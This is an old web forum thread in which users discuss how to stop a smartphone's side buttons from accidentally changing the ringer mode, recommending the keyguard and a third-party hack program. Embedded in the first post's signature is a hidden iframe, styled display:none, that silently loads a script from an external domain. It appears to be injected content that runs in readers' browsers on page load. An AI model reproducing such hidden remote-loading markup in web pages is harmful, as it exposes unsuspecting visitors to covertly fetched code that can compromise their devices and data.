+ Reply to Thread
    Smartphone Guru

Unhappy Can I lock ringer selection?

I keep my phone on vibrate at all times. However, when the phone is in my pocket, occassionally the up/down buttons on the side get hit and the ringer selection is changed to audible (very low) or worse, silent.

Is there any way to lock the ringer selection so that the up/down buttons don't modify it.

I did a search through this board but didn't find anyting.

I'd prefer not to lock my entire phone each time I am done using it. Does anyone know of another way?

Thanks.
    -Gadgetpro<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Gadget Lover
    ok, you can't lock the ringer selection... but what i want to know is why is your phone screen on when it's in your pocket? The volume up/down keys only when the main screen is active. Are you also hitting the power buttons to turn it on, and then hitting the volume keys afterwards?

Smartphone Guru
    Hmmm, you are right. I don't know, I must be hitting the power button too sometimes.

It has happened to me numerous times lately that I will pull out my phone to look something up and I will have missed calls because the ringer is on silent.

Are there any good hackmaster types out there who could give me a quick hack to disable that function of those buttons?

Thx.
    -Gadgetpro
    Last edited by gadgetpro; 10-11-2002 at 02:49 PM.

Gadget Lover
    all i can think of is invoking the keyguard when your not using the phone. just hold down the second icon from the right in the phone menu for a couple seconds and there will be no more accidents

Administrator

Arrow

yes use keyguard. and when the pone rings, you just go ahead an answer.. no need to take it off KG..

Smartphone Guru
    But to pull my phone out and use the palm side, I have to unlock it again and it seems a little hard to do without the stylus. Does anyone know of a better way to unlock the phone or an autolock that will lock the phone side upon the shutoff timeout.

Thx.
    -Gadgetpro

Administrator

Arrow

there are some secruity hacks out there that will do this. there should be a thread somewhere discussing them. try a search using "security"...

I use keyguard all the time, but I access it via a program called Jake's i300 Phone MultiHack. The way I have my phone set, I just hit the voice memo button twice to engage/disengage the keyguard. Very quick and easy to get used to.

Another nice thing is that on the few occasions that I accidently deactive the keyguard while the phone is in my pocket, I will hear the low buzz and know that my phone is active.

Check out the multhack thread HERE.